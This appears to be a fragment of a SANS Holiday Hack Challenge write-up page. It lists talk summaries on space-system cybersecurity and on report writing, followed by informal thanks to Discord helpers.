This talk will introduce the space systems and how data flows within them, with a closer look at the specifics that are interesting for cybersecurity professionals. Ground station networks, systems and protocols will be discussed. A model for space systems will be showcased, with an emphasis on how a space system can be potentially exploited via cyber means. The talk will briefly go over a real-world example of how a space enterprise was breached and what components were exploited. The talk will conclude with an overview of free and open source resources for getting started with embedded flight software and command and control systems.
Click here to watch this talk!
Tinsels and Templates: Putting the Fun Back in Functional Reporting
Speaker(s): Thomas Bouve
Do you dislike report writing? Never know where to start? Well, in this talk Thomas Bouve shows you how to set up and use his award-winning report template, and shares some report writing tips and tricks he picked up as a former SANS Holiday Hack Challenge player.
Click here to watch this talk!
Achievements
Special Shout Outs to:
The Entire SANS and CounterHack teams!!!
Discorders (People on Discord who helped with my cranio-rectalectmy [nicer way of saying getting my head out of my ass]):
elakamarcus
devastai0n
i81b4u
DeepPurple
FluffMe
fauxkassarole
tw2k
